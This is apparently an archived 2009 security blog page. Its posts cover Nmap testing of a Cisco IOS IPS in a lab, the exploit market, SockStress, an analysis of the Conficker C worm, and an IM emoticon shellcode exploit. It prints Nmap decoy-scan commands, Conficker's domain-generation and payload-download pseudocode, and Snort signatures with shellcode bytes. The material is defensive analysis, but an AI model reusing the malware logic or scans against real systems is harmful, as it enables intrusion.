Sunday, April 26, 2009

Cisco IOS IPS Testing with Nmap Scan

When you are implementing a system on the network, you always perform testing (security, performance, etc.) before it makes an attacker to do so. The aim of this paper is to make a short introduction on one of these tests to be performed prior to the production envrionment we are going to implement.

To benefit from the Cisco routers, I will implement the solution that co-ordinates number of models under Cisco IOS Intrusion Prevention System (IPS).

According to Cisco:

“Cisco IOS Intrusion Prevention System (IPS) provides an inline, deep-packet inspection feature that effectively mitigates a wide range of network attacks.”

Platforms that support this feature are:
800: 871, 876, 877, 878, 881, 887, 888

Family 1800: 1801, 1802, 1803, 1811, 1812, 1841, 1861

Family 2800: 2801, 2811, 2821, 2851

Family 3800: 3825,3845

Family SR520: SR520

Family 7200: 7204VXR, 7206VXR

Family 7301: 7301

Note: As of last May 2008 platforms Cisco recommends upgrading to a version of IOS 12.4 (11) T2 or later, to be compatible with the new signature system 5.x.

If you want to update the signatures, follow the link below: (requires CCO login).

For those managers who are starting in the world of Cisco Security, I have seen that many people like to use a tool, Security Device Manager (SDM). And I think that if this is the first time you are going to deploy such solution it is better to undertake the use of such tool in order avoid confusion instead trying via CLI.

The audience for this paper could be network administrators with basic knowledge of networking, TCP/IP protocol, CCNA Security or equivalent. I will the part of installing SDM and the normal router settings but in case if you need it, please drop me an e-mail.

Here is the scenario:

As in the laboratory environment, we asume that the network segment is and has access to the public internet.

Launching Backtrack to do the scans against NAT-IP of a router, can be performed as:

Nmap –PN –O –sV –v –sS

The results are similar to the following image:

Look at the log of IOS IPS:

The above log shows:

1. Number of Signatures (Sigs) such as: 2004, 3040, 3041, 3042.

2. Display the type of packets: ICMP Echo Req (ping), TCP SYN / FIN, etc

3. The IP source and destination

Using the NMap option “decoy -D”, we try to conceal the attacker's IP with the fake ip addresses, and the results from IPS are shown in the figure below:

Looking at the log, it appears that the alerts are generated with the same number of signatures to the previous image but with different IP addresses (i.e. attacker). While the log shows the number of signatures it matches the SDM and choose an action to be taken in addition to the default which is: “Alarm”. For example, we choose the signature 3040 and add a DROP action.

After applying the changes, run NMap and look at the results shown below:

However, it should be noted that NMap does not give accurate results on determining the OS. Now for instance, choose the first signature of the log (2004) and define the action “denyAttacker”.

Look at the following results from a router after the new action has been defined:

As we can see that NMap cannot detect any open but instead report them as filtered.


Cuando se hace una implementación de un sistema en una red, siempre se deben hacer pruebas (seguridad, rendimiento, etc.) antes de que un atacante las haga por nosotros. El objetivo de este artículo es hacer una pequeña introducción a una de las pruebas que se deben realizar antes de poner en producción el sistema que estamos implementando.

Para sacarle provecho a los Routers Cisco, se va a implementar la solución que traen varios modelos la cual es Cisco IOS Intrusion Prevention System (IPS).

Según Cisco, un IPS es un sistema en línea con características de inspección de paquete profundo, que efectivamente mitiga un gran rango de ataques de red.

Las plataformas que soportan esta característica son:
Familia 800: 871, 876, 877, 878, 881, 887, 888
Familia 1800: 1801, 1802, 1803, 1811, 1812, 1841, 1861
Familia 2800: 2801, 2811, 2821, 2851
Familia 3800: 3825,3845
Familia SR520: SR520
Familia 7200: 7204VXR, 7206VXR
Familia 7301: 7301

Nota: A partir del pasado mes de Mayo del año 2008 Cisco recomienda actualizar las plataformas a una versión del IOS 12.4(11)T2 o posterior, para que sea compatible con el nuevo sistema de firmas 5.x.

Si desean la actualización de firmas hay que dirigirse al link: (requiere CCO login).

Para aquellos administradores que están empezando en el mundo de Cisco Security, he visto que a muchos les gusta usar la herramienta Security Device Manager (SDM), y creo que si es la primera vez que vamos a implementar esta solución es mejor hacerlo con dicha herramienta para que no existan confusiones al tratar de implementarla vía CLI.
Como la audiencia de este artículo es de administradores de red con conocimientos básicos de redes, protocolo TCP/IP, CCNA Security o equivalentes; me saltare la parte de cómo instalar el SDM y la configuración del router, en caso de que la necesiten, no duden en enviarme un e-mail y con gusto les envío la guía.

Este es el escenario:

Como se está en un ambiente de laboratorio, imaginemos que el segmento es un segmento publico de internet.

Con Backtrack realizamos un scan a la ip pública de nuestro router:

Nmap –PN –O –sV –v –sS

Se obtiene un resultado similar a la siguiente imagen:

Observemos el log del IOS IPS:

En el log se aprecia:
1. El número de Firma (Sig) como son: 2004, 3040, 3041, 3042.
2. Muestra el tipo de paquete: ICMP Echo Req (un ping), TCP SYN/FIN, etc.
3. La IP de origen y la de destino.

Usando la opción “decoy –D” del NMap, trataremos de camuflar la ip del atacante con direcciones ip falsas; el IPS mostrara una gama de direcciones como se observa en la siguiente figura:

Si se analiza el log, se observa que nos alerta de los mismos números de firmas de la imagen anterior pero con diferentes ip (entre las cuales se encuentra la del atacante).
Como el log muestra el número de firma, se busca en el SDM y se elije una acción a tomar además de la predeterminada que es: “Alarm”. Para dar un ejemplo elegimos la firma 3040 y añadimos la acción DROP.

Una vez aplicados los cambios, se corre el nmap y observamos el resultado, como muestra la siguiente imagen:

Sin embargo, se debe notar que NMap se le dificulta determinar el O.S.
Ahora para otro ejemplo, se elije la primera firma del log (2004) y tomamos la acción de “denyAttacker”.

Observemos el resultado al realizar un scan al router una vez aplicada la nueva acción:

Se aprecia como el nmap no puede detectar los puertos abiertos y muestra que los puertos scaneados están siendo filtrados.

Saturday, April 25, 2009

A Vulnerability Research to the Real World's Exploit Market

A software vulnerability is always count as an after math on vendor supplied application. Although, if the proper security controls have been in place before the delivery of the actual software then it might have less chance of any common security defect. Recently, number of known organizations have came out to make a bridge between 0-day vulnerability researchers and the software vendors to help reduced the security issues in their applications. At the same time, market has grown more efficienly and in parallel with different security researchers from around the world. Few of those companies who pay to the researchers are:

Zero Day Initiative: (3Com/TippingPoint division)
iDefense VCP: (VeriSign's company)
Snosoft: (Netragard's company)

To mention, each of these organizations have their own terms and conditions and payment structure for vulnerabilities and exploit codes. According to the guide, "2007-The Legitimate Vulnerability Market" few most important key issues have been highlighted regarding vulnerability from zero day perspectives.

1. Vulnerability information is time-sensitive commodity
2. No transparency in pricing (there is no public information on any vulnerability types, it depends on different factors)
3. Finding buyers and sellers
4. Checking the buyer
5. Actual value of 0day vulnerbaility cannot be initiated unless the loss is demonstrated
6. Intellectual property rights (how the researcher should feel safe in demonstration without losing its exclusive rights over vulnerability research)

Each vulnerability researched and provided with underline PoC (proof-of-concept) code is passed through number of stages as the one given below, through above third-party legitimate :

Date Action
---- ------
06/05 Vulnerability discovered.
11/7/05 Submitted to prepub review at NSA.
7/27/06 Approved for release by prepub review.
7/27/06 Offered to government.
8/10/06 Verbally agreed to $80,000 conditional deal.
8/11/06 Exploit given for evaluation.
8/25/06 Hash of exploit published.
8/28/06 Agreed to lesser amount
09/8/06 Paid

For several years, security researchers have involved with many types of organizations including Financial institutions, Service providers, OS vendors, Security vendors, Government and Defense operators to help remove any un-discovered security flaws. Taking further highlights from the above article give more clear overview on exploit pricing structure ranging from $4000-250,000.

Wednesday, April 15, 2009

Re-visiting the End of Internet (SockStress): Meltdown the internet in few seconds

Few months back, researchers come out with the generic vulnerability held in TCP/IP services. This vulnerability affects almost all systems utilizing TCP stack, including Windows, Linux, Mac and BSD. However, the attack itself is a new breed of denial of service (DoS) attacks. Researchers also put forward the sockstress tool to demonstrate the devastating affects of such vulnerabilities. The full details regarding this threat will come out in June.

The attack can be described as following:

1. Attacker sends TCP-SYN raw packet to the destination port.
2. The target OS respond with SYN/ACK packet as a part of 3-way handshake process.
3. Extracting initial sequence numbers and other information from received packet, attacker now sends the final ACK packet to complete the connection process.

Although, the process looks similar to the 3-way handshake process but remember the packets sent from attacker zone are from userland rather than OS based TCP stack.

More information is available at:

Various Press/Media coverage at:

Friday, April 3, 2009

Silence of Storm Worm: Welcome the Rolling Infection of Conficker 'C'

"Conficker .aka. Conflicker .aka. Downup .aka. Downadup .aka. Kido"

Conficker 'C' variant first strike out on the internet during 20-Nov-2008. As this variant has considerable changes compared to those of 'B'. Approximately, 14.9% similar code found in their process images when disassembled.

The details of these images can be found at:

So what makes the difference in variant 'C'? To notice, this new variant of Conficker adds major functionality for P2P co-ordination channel and the revised version of domain generation algorithm (DGA). The main features of Conficker 'C' variant are as follows:

-Capable of incorporating 50,000 randomly generated domain names with the spreading process of 110 TLDs (top-level domains)
-Use of advanced encrytion, digital signatures, and hashing algorithm to protect its zombies from being hijacked. Namely RC4, RSA, and MD6

Conficker.C program logic is give below:

The new hybrid nature of variant 'C' has produced a specifc structure/algorithm for generating more domains in comparison to old 'A' and 'B' classes. The pseudo-code for new DGA is given below:

int domain_name_generation()
// local declarations
hMem = 0;

hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
if ( hMem )
while ( 1 )
counter_domains = counter;
if ( counter >= 50000 )

size_of_name = DGA_random_function() % 6 + 4;
// size of domain name is between 4 and 10 chars
// append "." at the end of the name
random = DGA_random_function();
strcat(domainname, TLD-suffix[random num % 116] );
// append 1 of 116 suffixes (from 110 TLDs) to domain name

// select and query 500 domains
counter_domains = 0;
while ( !success_download && counter_domains < 500 )
// random number modulo 50,000
one_in_50000_names = conficker_D_PRNG_function() % 50,000);
hostent = gethostbyname(one_in_50000_names);
// resolve name to a set of IP addresses
if ( hostent )
host_address = hostent->address_list; // get list of IPs
array_previously_checked_IPs[counter_domains] = host_address;

if ( *host_address )
// skip if domain name resolves to multiple IP addresses
if ( !*(host_address + 1) )
// skip if IP is local host or other trivial IPs
if ( check_IP_value(host_address) )
is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
// skip if IP is blacklisted
if ( ! is_blacklisted_ip )
found = 0;
index = 0;
while (index < counter_domains )
if (host_address == array_previously_checked_IPs[index] )
found = 1;
break; // break if IP has been previously encountered
// skip if IP has been previously encountered
if ( !found )
snprintf(Dest, 0x80u, "http://%s", host_address);
success_download = download_and_validate_file(Dest);
// HTTP request to the domain and download valid file
Sleep(...); // sleep small random amount
return success_download;

Its p2p setup architecture implements the binary download validation, HTTP based date checking through well-known website headers, anti-debugger segments and other logic.

However, there are additional features introduced in this new variant which propogate infection of "millions" of computers world wide putting French and American Air Force, Navy, Hospials, Military networks and even strike out the big giants like Microsoft. For this reason, to step ahead, Microsoft is offering $250,000 to anyone who could report this worm creator. Apart, there are some private firms offering more than $350,000 to half-million US dollars.

The main symptoms of Conficker infection can be inferred from following actions:

1. Account lockout policies being reset automatically.
2. Certain Microsoft Windows services such as Automatic Updates, BITS, Windows Defender, and Error Reporting Services are automatically disabled.
3. Domain controllers respond slowly to client requests.
4. System network gets unusually congested. This can be checked with network traffic chart on Windows Task Manager.
5. On websites related to antivirus software, Windows system updates cannot be accessed.
6. Launches a brute force attack against administrator passwords to help it spread through ADMIN$ shares, making choice of sensible passwords advisable.
7. Port 445/TCP scanning (A/B)
8. Multicast UPnP requests
9. High-port TCP and UDP P2P Activity
10.Up to 500 DNS lookups/HTTP GET request across 110 TLDs per day (C variant)
11.Removal of all System Restore Points
12.High-port (pseudo random) TCP and UDP P2P activity

Detection Mechanisms:

1. Network Detection Signatures

Snort Signature for A/B shellcodes (presented at Honeynet Project)
alert tcp any any -> $HOME_NET 445 (msg: "conficker.a shellcode"; content: "|e8 ff ff ff ff c1|^|8d|N|10 80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|& $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Worm Activity"; flow:to_server,established; uricontent:"/GeoIP.dat.gz"; classtype:trojan-activity; reference:url,; reference:url,; reference:url,; reference:url,; sid:2008802; rev:3;)
alert tcp $HOME_NET any -> [,,,,] $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Infection Checking Geographical Location"; flow:to_server; classtype:trojan-activity; reference:url,; reference:url,; threshold:type both, count 5, seconds 60, track by_src; reference:url,; reference:url,; sid:2008803; rev:3;)

2. Check your computer for infection (ONLINE)

3. Removal Tools from various AV companies and security

More Up-To-Date information of current removal tools at:

Memory Disinfector

Detecting Conficker Files and Registry

Nonficker Vaxination Tool

4. Sandbox Detection Results (Conficker C)

5. Process Image comparison of Conficker 'B' and 'C'

6. Conficker.C Domain Collisions

7. Domain Generator Filtered Address Ranges

Samples of "Conficker" worm are available on special request.

Wednesday, April 1, 2009

Wide Exploitation of Chatting Applications (A friend's smile or the devil)

So which IM messenging service you're using today? and that you trust the most?


...and many others.

Recently, the researchers Yoann Guillot and Julien Tinnes has came up to expose the ground reality or the root of massive attacks against instant messaging applications. The threat identified is based on the set of highly animated emoticons or simple smileys. Although, from the dark ages of underground world, this could be the old exploit. The PoC (proof-of-concept) code has been implemented under Ruby on Rails technology and is available at:

The potential of this exploit is very high and unacceptable because nearly 95% of internet users use IM applications on day to day basis. Researchers have implemented the encoder above to land any malicious shellcode inside the smiley or animated icon. However, to notice, the current implimentation is limited with the shellcode compliant with MSN based emoticons only. Code can be complied under 'C' with 'metasm' to test the exploit. This has laid a very extensive challenge for the security community to identify the attack patterns in order to protect such threats at IDS/IPS devices.

Happy Rooting...